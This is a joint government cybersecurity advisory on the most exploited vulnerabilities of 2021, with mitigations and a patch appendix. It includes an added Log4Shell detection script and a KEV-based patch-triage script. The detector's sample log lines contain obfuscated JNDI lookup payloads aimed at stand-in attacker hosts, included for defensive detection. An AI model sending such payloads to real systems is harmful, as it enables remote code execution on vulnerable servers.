### Summary
This joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency ([CISA](<https://www.cisa.gov/>)), National Security Agency ([NSA](<https://www.nsa.gov/Cybersecurity/>)), Federal Bureau of Investigation ([FBI](<https://www.fbi.gov/investigate/cyber>)), Australian Cyber Security Centre ([ACSC](<https://www.cyber.gov.au/>)), Canadian Centre for Cyber Security ([CCCS](<https://www.cyber.gc.ca/en/>)), New Zealand National Cyber Security Centre ([NZ NCSC](<https://www.gcsb.govt.nz/>)), and United Kingdom’s National Cyber Security Centre ([NCSC-UK](<https://www.ncsc.gov.uk/>)). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.
U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess that, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets.
The cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.
### Technical Details
#### **Key Findings**
Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors.
To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities—some of which were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.
#### **Top 15 Routinely Exploited Vulnerabilities**
Table 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include:
* **CVE-2021-44228.** This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework. An actor can exploit it by submitting a specially crafted request to a vulnerable system: the request carries a string that Log4j interprets as a JNDI lookup, which can cause the system to retrieve and execute attacker-controlled code. This gives the actor full control of the system, from which they can steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. The vulnerability was disclosed in December 2021; its rapid, widespread exploitation demonstrates the ability of malicious actors to weaponize known vulnerabilities quickly and target organizations before they patch.
* **CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065.** These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., “vulnerability chaining”) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.
* **CVE-2021-34523, CVE-2021-34473, CVE-2021-31207.** These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS), Microsoft’s web server. CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
* **CVE-2021-26084.** This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
Three of the top 15 routinely exploited vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.
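As an added detection example, not part of the advisory, the following Python scans web-server access logs for the JNDI lookup strings that Log4Shell exploitation attempts carry, first undoing the URL-encoding and nested-lookup obfuscation (`${lower:j}`, `${::-j}`) that attackers used in 2021 to evade plain string matching. The log lines, the combined-log-format layout and the `normalize` and `find_log4shell_attempts` function names are constructed for this example.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample access-log lines (combined log format), not taken from the
# advisory. Lines 1 and 5 are benign; lines 2-4 carry a JNDI lookup in the
# User-Agent or query string using three obfuscations seen in 2021 traffic:
# plain, nested ${lower:...} lookups, and URL-encoding.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
203.0.113.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:r}mi://203.0.113.8:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET /login HTTP/1.1" 200 100 "-" "%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fz%7D"
10.0.0.6 - - [10/Dec/2021:12:00:05 +0000] "POST /api/v1 HTTP/1.1" 200 20 "-" "python-requests/2.25.1"
"""

# Log4j lookup forms used to hide the literal "jndi":
#   ${lower:X} / ${upper:X}  -> X with its case changed
#   ${<anything>:-X}         -> the default value X (e.g. ${::-j}, ${env:NOPE:-j})
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}$]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$]*:-([^{}$]*)\}")
# The lookup that matters once obfuscation is stripped, with its scheme if present.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode and resolve nested lookups until the string stops changing."""
    for _ in range(8):  # bounded so hostile input cannot keep us looping
        before = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_log4shell_attempts(log_text: str) -> List[Dict[str, object]]:
    """Return one record per log line that contains a JNDI lookup after normalization."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        decoded = normalize(line)
        match = _JNDI.search(decoded)
        if match is None:
            continue
        end = decoded.find("}", match.start())
        hits.append({
            "line": lineno,
            "source_ip": line.split(" ", 1)[0],  # first field of the combined log format
            "scheme": (match.group(1) or "").lower(),
            "payload": decoded[match.start():] if end == -1 else decoded[match.start(): end + 1],
        })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['source_ip']} {hit['scheme']} {hit['payload']}")
```

A hit records an attempt, not a successful compromise: the lookup only fires if the string reached a vulnerable Log4j call and the host could connect back to the attacker's LDAP, RMI or DNS endpoint, so pair this scan with outbound-connection logs from the host. The string can arrive in any field an application logs, not only the User-Agent and query string shown here, and matching on `${jndi:` after normalization catches the encodings seen in 2021 rather than every encoding an attacker could devise.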
_Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021_
| CVE | Vulnerability Name | Vendor and Product | Type |
|---|---|---|---|
| [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) | Log4Shell | Apache Log4j | Remote code execution (RCE) |
| [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) | | Zoho ManageEngine AD SelfService Plus | RCE |
| [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) | ProxyShell | Microsoft Exchange Server | Elevation of privilege |
| [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) | ProxyShell | Microsoft Exchange Server | RCE |
| [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) | ProxyShell | Microsoft Exchange Server | Security feature bypass |
| [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) | ProxyLogon | Microsoft Exchange Server | RCE |
| [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) | ProxyLogon | Microsoft Exchange Server | RCE |
| [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | ProxyLogon | Microsoft Exchange Server | RCE |
| [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) | ProxyLogon | Microsoft Exchange Server | RCE |
| [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) | | Atlassian Confluence Server and Data Center | Arbitrary code execution |
| [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) | | VMware vSphere Client | RCE |
| [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | ZeroLogon | Microsoft Netlogon Remote Protocol (MS-NRPC) | Elevation of privilege |
| [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | | Microsoft Exchange Server | RCE |
| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | | Pulse Secure Pulse Connect Secure | Arbitrary file reading |
| [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | | Fortinet FortiOS and FortiProxy | Path traversal |
#### **Additional Routinely Exploited Vulnerabilities**
In addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021.
These vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. Three of these vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882.
_Table 2: Additional Routinely Exploited Vulnerabilities in 2021_
| CVE | Vendor and Product | Type |
|---|---|---|
| [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>) | Sitecore XP | RCE |
| [CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>) | ForgeRock OpenAM server | RCE |
| [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) | Accellion FTA | OS command execution |
| [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) | Accellion FTA | Server-side request forgery |
| [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) | Accellion FTA | OS command execution |
| [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) | Accellion FTA | SQL injection |
| [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>) | VMware vCenter Server | RCE |
| [CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>) | SonicWall Secure Mobile Access (SMA) | RCE |
| [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) | Microsoft MSHTML | RCE |
| [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) | Microsoft Windows Print Spooler | RCE |
| [CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>) | Sudo | Privilege escalation |
| [CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>) | Checkbox Survey | Remote arbitrary code execution |
| [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>) | Pulse Secure Pulse Connect Secure | Remote arbitrary code execution |
| [CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>) | SonicWall SSLVPN SMA100 | Improper SQL command neutralization, allowing for credential access |
| [CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) | Windows Print Spooler | RCE |
| [CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>) | QNAP QTS and QuTS hero | Remote arbitrary code execution |
| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller (ADC) and Gateway | Arbitrary code execution |
| [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | Progress Telerik UI for ASP.NET AJAX | Code execution |
| [CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) | Cisco IOS Software and IOS XE Software | Remote arbitrary code execution |
| [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) | Microsoft Office | RCE |
| [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) | Microsoft Office | RCE |
### Mitigations
#### **Vulnerability and Configuration Management**
* Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix.
* If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.
* Use a centralized patch management system.
* Replace end-of-life software, i.e., software that is no longer supported by the vendor. For example, Accellion FTA was retired in April 2021.
* Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications—such as webmail, file storage, file sharing, and chat and other employee collaboration tools—for their customers. However, because MSPs and CSPs expand their client organizations’ attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources.
  * CISA Insights [Risk Considerations for Managed Service Provider Customers](<https://cisa.gov/sites/default/files/publications/cisa-insights_risk-considerations-for-msp-customers_508.pdf>)
  * CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)
  * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/acsc/view-all-content/publications/how-manage-your-security-when-engaging-managed-service-provider>)
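The patch-ordering rule in the first bullet above (known exploited vulnerabilities, especially the CVEs in this CSA, then critical and high RCE or denial-of-service on internet-facing equipment) can be made a repeatable triage step. The Python below is an added example, not code from the advisory or from CISA: it ranks vulnerability-scanner findings into tiers in that order and flags KEV entries whose remediation due date has passed. The KEV excerpt uses the real feed's field names (`cveID`, `vendorProject`, `product`, `dateAdded`, `dueDate`) but is a constructed sample with illustrative dates; the `Finding` schema, the asset names and the `CVE-0000-000x` placeholders are hypothetical.

```python
import json
from dataclasses import dataclass
from datetime import date
from typing import Dict, List

# CVEs in Table 1 of this advisory (the 2021 top 15).
ADVISORY_TOP15 = {
    "CVE-2021-44228", "CVE-2021-40539", "CVE-2021-34523", "CVE-2021-34473",
    "CVE-2021-31207", "CVE-2021-27065", "CVE-2021-26858", "CVE-2021-26857",
    "CVE-2021-26855", "CVE-2021-26084", "CVE-2021-21972", "CVE-2020-1472",
    "CVE-2020-0688", "CVE-2019-11510", "CVE-2018-13379",
}

# Constructed excerpt shaped like CISA's KEV JSON feed. Field names match the
# feed; the entries are a sample and the due dates are illustrative, not the
# catalog's actual values.
KEV_SAMPLE = json.loads("""
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "dateAdded": "2021-12-10", "dueDate": "2021-12-24"},
    {"cveID": "CVE-2018-13379", "vendorProject": "Fortinet", "product": "FortiOS",
     "dateAdded": "2021-11-03", "dueDate": "2022-05-03"},
    {"cveID": "CVE-2021-34527", "vendorProject": "Microsoft", "product": "Windows Print Spooler",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17"},
    {"cveID": "CVE-2021-3156", "vendorProject": "Sudo", "product": "Sudo",
     "dateAdded": "2022-04-06", "dueDate": "2022-05-30"}
  ]
}
""")


@dataclass(frozen=True)
class Finding:
    """One scanner result (hypothetical schema for this example)."""
    cve: str
    asset: str
    internet_facing: bool
    cvss: float
    impact: str  # "RCE", "DoS", "EoP", "Info", ...


# Constructed scanner output. CVE-0000-0001/0002 are placeholders for findings
# that are in neither this advisory nor KEV; they are not real CVE identifiers.
SAMPLE_FINDINGS = [
    Finding("CVE-2021-34527", "print-01", False, 8.8, "RCE"),
    Finding("CVE-0000-0002", "db-04", False, 5.3, "Info"),
    Finding("CVE-2018-13379", "vpn-01", True, 9.8, "Path traversal"),
    Finding("CVE-0000-0001", "web-03", True, 9.8, "RCE"),
    Finding("CVE-2021-3156", "build-02", False, 7.8, "EoP"),
    Finding("CVE-2021-44228", "edge-app-01", True, 10.0, "RCE"),
]


def kev_index(kev_json: dict) -> Dict[str, dict]:
    """Index the KEV feed by CVE ID for O(1) lookups."""
    return {v["cveID"]: v for v in kev_json["vulnerabilities"]}


def tier_for(finding: Finding, kev: Dict[str, dict]):
    """Map a finding to a patch tier in the order the advisory gives (0 = first)."""
    if finding.cve in ADVISORY_TOP15:
        return 0, "listed in Table 1 of this advisory"
    if finding.cve in kev:
        return 1, "in CISA KEV catalog (due %s)" % kev[finding.cve]["dueDate"]
    if finding.internet_facing and finding.cvss >= 7.0 and finding.impact in ("RCE", "DoS"):
        return 2, "high/critical RCE or DoS on an internet-facing asset"
    return 3, "routine patch cycle"


def prioritize(findings: List[Finding], kev_json: dict, today: date) -> List[dict]:
    """Rank findings by tier, then by CVSS within a tier; flag KEV entries past due."""
    kev = kev_index(kev_json)
    ranked = []
    for f in findings:
        tier, reason = tier_for(f, kev)
        overdue = f.cve in kev and date.fromisoformat(kev[f.cve]["dueDate"]) < today
        ranked.append({"cve": f.cve, "asset": f.asset, "cvss": f.cvss,
                       "tier": tier, "reason": reason, "kev_overdue": overdue})
    ranked.sort(key=lambda r: (r["tier"], -r["cvss"]))
    return ranked


def overdue_kev(ranked: List[dict]) -> List[str]:
    """CVE IDs in the ranked list whose KEV due date has already passed."""
    return [r["cve"] for r in ranked if r["kev_overdue"]]


if __name__ == "__main__":
    for r in prioritize(SAMPLE_FINDINGS, KEV_SAMPLE, date.today()):
        print(r["tier"], r["cve"], r["asset"], r["reason"], "OVERDUE" if r["kev_overdue"] else "")
```

In practice, replace `KEV_SAMPLE` with the JSON feed downloaded from the KEV catalog page linked above and feed in the scanner's export; the tier is what a ticket queue should sort on, and the overdue list is the set to escalate first.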
#### **Identity and Access Management**
* Enforce multifactor authentication (MFA) for all users, without exception.
* Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords.
* Regularly review, validate, or remove privileged accounts (annually at a minimum).
* Configure access control according to the principle of least privilege.
* Grant software service accounts only the permissions needed for their intended functions (least privilege, non-administrative).
**Note:** see [CISA Capacity Enhancement Guide – Implementing Strong Authentication](<https://cisa.gov/sites/default/files/publications/CISA_CEG_Implementing_Strong_Authentication_508_1.pdf>) and ACSC guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/acsc/view-all-content/publications/implementing-multi-factor-authentication>) for more information on hardening authentication systems.
#### **Protective Controls and Architecture**
* Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices.
* Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.
* Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.
* Strictly control the use of native scripting and remote-management tooling, such as the command line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).
* Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks.
* Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware.
* Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure that your EDR, SIEM, vulnerability scanner, etc., report the same set of assets.
* Monitor the environment for potentially unwanted programs.
* Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions.
* Implement application allowlisting.
### **Resources**
* For the top vulnerabilities exploited in 2020, see joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>)
* For the top exploited vulnerabilities 2016 through 2019, see joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa20-133a>).
* See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.
### **Disclaimer**
The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
### **Purpose**
This document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
### **References**
[1] [CISA’s Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)
### **Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities**
CVE
|
Vendor
|
Affected Products
|
Patch Information
|
Resources
---|---|---|---|---
[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)
|
Sitecore
|
Sitecore XP 7.5.0 - Sitecore XP 7.5.2
Sitecore XP 8.0.0 - Sitecore XP 8.2.7
|
[Sitecore Security Bulletin SC2021-003-499266](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776#HistoryOfUpdates>)
|
ACSC Alert [Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerable-sitecore-experience-platform-content-management-systems>)
[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)
|
ForgeRock
|
Access Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3
OpenAM 9.x, 10.x, 11.x, 12.x and 13.x
|
[ForgeRock AM Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>)
|
ACSC Advisory [Active exploitation of ForgeRock Access Manager / OpenAM servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-004-active-exploitation-forgerock-access-manager-openam-servers>)
CCCS [ForgeRock Security Advisory](<https://www.cyber.gc.ca/en/alerts/forgerock-security-advisory>)
[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)
|
Accellion
|
FTA 9_12_370 and earlier
|
[Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)
|
Joint CSA [Exploitation of Accellion File Transfer Appliance](<https://www.cisa.gov/uscert/ncas/alerts/aa21-055a>)
ACSC Alert [Potential Accellion File Transfer Appliance compromise](<https://www.cyber.gov.au/acsc/view-all-content/alerts/potential-accellion-file-transfer-appliance-compromise>)
[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)
|
FTA 9_12_411 and earlier
[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)
|
FTA versions 9_12_411 and earlier
[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)
|
FTA 9_12_370 and earlier
|
[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)
|
VMware
|
vCenter Server 7.0, 6.7, 6.5
Cloud Foundation (vCenter Server) 4.x and 3.x
|
[VMware Advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>)
|
CCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-41>)
[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)
|
VMware
|
vCenter Server 7.0, 6.7, 6.5
Cloud Foundation (vCenter Server) 4.x and 3.x
|
[VMware Advisory VMSA-2021-0002](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>)
|
ACSC Alert [VMware vCenter Server plugin remote code execution vulnerability](<https://www.cyber.gov.au/acsc/view-all-content/alerts/vmware-vcenter-server-plugin-remote-code-execution-vulnerability-cve-2021-21972>)
CCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-35>)
CCCS Alert [APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>)
[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)
|
SonicWall
|
SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv
|
[SonicWall Security Advisory SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>)
|
ACSC Alert [Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)
CCCS [SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4>)
[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)
|
Apache
|
Log4j, all versions from 2.0-beta9 to 2.14.1
For other affected vendors and products, see [CISA's GitHub repository](<https://github.com/cisagov/log4j-affected-db>).
|
[Log4j: Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>)
For additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>)
|
CISA webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)
CCCS [Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability>)
[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)
|
Zoho ManageEngine
|
ADSelfService Plus version 6113 and prior
|
[Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release ](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>)
|
Joint CSA [APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://www.cisa.gov/uscert/ncas/alerts/aa21-259a>)
CCCS [Zoho Security Advisory](<https://www.cyber.gc.ca/en/alerts/zoho-security-advisory>)
[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>)
|
Microsoft
|
Multiple Windows products; see [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)
|
[Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)
|
[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)
|
Microsoft
|
Multiple Windows products; see [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)
|
[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)
|
Joint CSA [Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>)
CCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>)
[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)
|
Microsoft
|
Microsoft Exchange Server 2013 Cumulative Update 23
Microsoft Exchange Server 2016 Cumulative Updates 19 and 20
Microsoft Exchange Server 2019 Cumulative Updates 8 and 9
|
[Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>)
|
Joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)
ACSC Alert [Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/acsc/view-all-content/alerts/microsoft-exchange-proxyshell-targeting-australia>)
[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)
|
Microsoft
|
Multiple Exchange Server versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>)
|
